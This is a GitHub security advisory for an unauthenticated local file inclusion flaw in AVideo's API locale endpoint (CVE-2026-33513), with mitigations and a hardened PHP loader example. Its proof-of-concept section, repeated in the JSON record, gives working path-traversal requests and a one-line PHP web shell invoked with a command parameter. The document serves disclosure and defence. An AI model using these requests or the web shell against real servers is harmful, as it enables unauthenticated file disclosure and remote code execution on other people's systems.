GHSA-8FW8-Q79C-FP9M
Vulnerability from github – Published: 2026-03-20 21:55 – Updated: 2026-03-25 20:44
Summary
AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)
Details
Summary
An unauthenticated API endpoint (APIName=locale) concatenates user input into an include path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., view/about.php), and it can escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree.
Details
- Entry point: plugin/API/get.json.php sets $global['bypassSameDomainCheck'] = 1 and merges GET/POST/JSON into $parameters without authentication or API secret.
- Handler: plugin/API/API.php, method get_api_locale() (lines ~5009–5023):

```php
// Vulnerable handler as quoted in the advisory: $parameters['language'] is attacker-controlled.
$parameters['language'] = strtolower($parameters['language']);
// Path is built by plain string concatenation, so "../" segments pass straight through.
$file = "{$global['systemRootPath']}locale/{$parameters['language']}.php";
if (!file_exists($file)) {
    return new ApiObject("This language does not exists");
}
// include executes whatever PHP the resolved path points at.
include $file;
```

  No validation is performed; ../ traversal is accepted.
- Because include executes PHP, any reachable PHP file is executed in the web server context.
PoC
- Fetch an arbitrary PHP file (no auth):

```
GET /plugin/API/get.json.php?APIName=locale&language=../view/about HTTP/1.1
Host: <target>
```

  Response returns the rendered About page HTML, proving traversal outside locale/.
- RCE with an attacker PHP file (any writable PHP path):

```
GET /plugin/API/get.json.php?APIName=locale&language=../videos/locale/shell&x=whoami
```

  If shell.php contains <?php system($_GET['x']); ?>, the response includes command output.
Impact
- Unauthenticated file inclusion of arbitrary PHP files under the web root.
- Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.
- Potential RCE if any attacker-writable PHP file exists elsewhere (not confirmed in this build).
- Affects any deployment with the API plugin enabled (default in docker-compose).
Mitigation
- Reject path separators/dots and enforce a strict allowlist of locale slugs.
- realpath the target and ensure it stays within $systemRootPath/locale.
- Stop using include for translations; load data from vetted formats (JSON/array).
- Add authentication (API secret/token) to the endpoint as a secondary control.
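A hardened locale loader that applies the first three mitigations above (slug allowlist, realpath containment under locale/, translations loaded as JSON data instead of include). This is an added example, not AVideo's own code; the function names, the .json translation layout and a $systemRootPath ending in a slash (as in the vulnerable snippet) are assumptions.

```php
<?php
// Added example, not AVideo's own code: a hardened locale loader that applies the
// advisory's first three mitigations. All function names here are assumptions.

// Canonicalise $language and require the translation file to live inside locale/.
// Returns the absolute path, or null when the slug or the resolved path is rejected.
function resolve_locale_file(string $language, string $systemRootPath): ?string
{
    $language = strtolower($language);
    // Mitigation 1: allowlist by shape ("en", "pt_br", "zh-hans"); any "/", "\", "."
    // or NUL byte fails here, before the filesystem is consulted.
    if (!preg_match('/^[a-z]{2,3}(?:[_-][a-z0-9]{2,8})?$/', $language)) {
        return null;
    }
    $localeDir = realpath($systemRootPath . 'locale');
    if ($localeDir === false) {
        return null;
    }
    // Mitigation 2: realpath the candidate and require it to stay under locale/.
    // realpath also follows symlinks, so a planted link pointing outside is rejected.
    $candidate = realpath($localeDir . DIRECTORY_SEPARATOR . $language . '.json');
    if ($candidate === false || strpos($candidate, $localeDir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Mitigation 3: translations are data decoded with json_decode, never include'd.
function load_locale(string $language, string $systemRootPath): ?array
{
    $file = resolve_locale_file($language, $systemRootPath);
    if ($file === null) {
        return null;
    }
    $data = json_decode((string) file_get_contents($file), true);
    return is_array($data) ? $data : null;
}

// Constructed self-test: a throwaway root with locale/en.json and a PHP file outside it.
$root = sys_get_temp_dir() . '/avideo-locale-demo-' . getmypid() . '/';
mkdir($root . 'locale', 0700, true);
mkdir($root . 'view', 0700, true);
file_put_contents($root . 'locale/en.json', '{"hello":"Hello"}');
file_put_contents($root . 'view/about.php', '<?php echo "about";');
$ok  = load_locale('en', $root);            // a legitimate slug
$bad = load_locale('../view/about', $root); // the advisory's traversal slug
var_dump($ok, $bad);
foreach ([$root . 'locale/en.json', $root . 'view/about.php'] as $f) unlink($f);
foreach ([$root . 'locale', $root . 'view', $root] as $d) rmdir($d);
```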
Severity
8.6 (High)
{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33513"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-98"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T21:55:31Z",
    "nvd_published_at": "2026-03-23T19:16:40Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. \n### Details\n- Entry point: `plugin/API/get.json.php` sets `$global[\u0027bypassSameDomainCheck\u0027]=1` and merges GET/POST/JSON into `$parameters` without authentication or API secret.\n- Handler: `plugin/API/API.php`, method `get_api_locale()` (lines ~5009\u20135023):\n ```php\n $parameters[\u0027language\u0027] = strtolower($parameters[\u0027language\u0027]);\n $file = \"{$global[\u0027systemRootPath\u0027]}locale/{$parameters[\u0027language\u0027]}.php\";\n if (!file_exists($file)) { return new ApiObject(\"This language does not exists\"); }\n include $file;\n ```\n No validation is performed; `../` traversal is accepted.\n- Because `include` executes PHP, any reachable PHP file is executed in the web server context.\n\n### PoC\n1. Fetch an arbitrary PHP file (no auth):\n ```\n GET /plugin/API/get.json.php?APIName=locale\u0026language=../view/about HTTP/1.1\n Host: \u003ctarget\u003e\n ```\n Response returns the rendered About page HTML, proving traversal outside `locale/`.\n2. RCE with an attacker PHP file (any writable PHP path):\n ```\n GET /plugin/API/get.json.php?APIName=locale\u0026language=../videos/locale/shell\u0026x=whoami\n ```\n If `shell.php` contains `\u003c?php system($_GET[\u0027x\u0027]); ?\u003e`, the response includes command output.\n\n### Impact\n- Unauthenticated file inclusion of arbitrary PHP files under the web root.\n- Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.\n- Potential RCE *if* any attacker-writable PHP file exists elsewhere (not confirmed in this build).\n- Affects any deployment with the API plugin enabled (default in docker-compose).\n\n### Mitigation\n- Reject path separators/dots and enforce a strict allowlist of locale slugs.\n- `realpath` the target and ensure it stays within `$systemRootPath/locale`.\n- Stop using `include` for translations; load data from vetted formats (JSON/array).\n- Add authentication (API secret/token) to the endpoint as a secondary control.",
  "id": "GHSA-8fw8-q79c-fp9m",
  "modified": "2026-03-25T20:44:38Z",
  "published": "2026-03-20T21:55:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33513"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)"
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.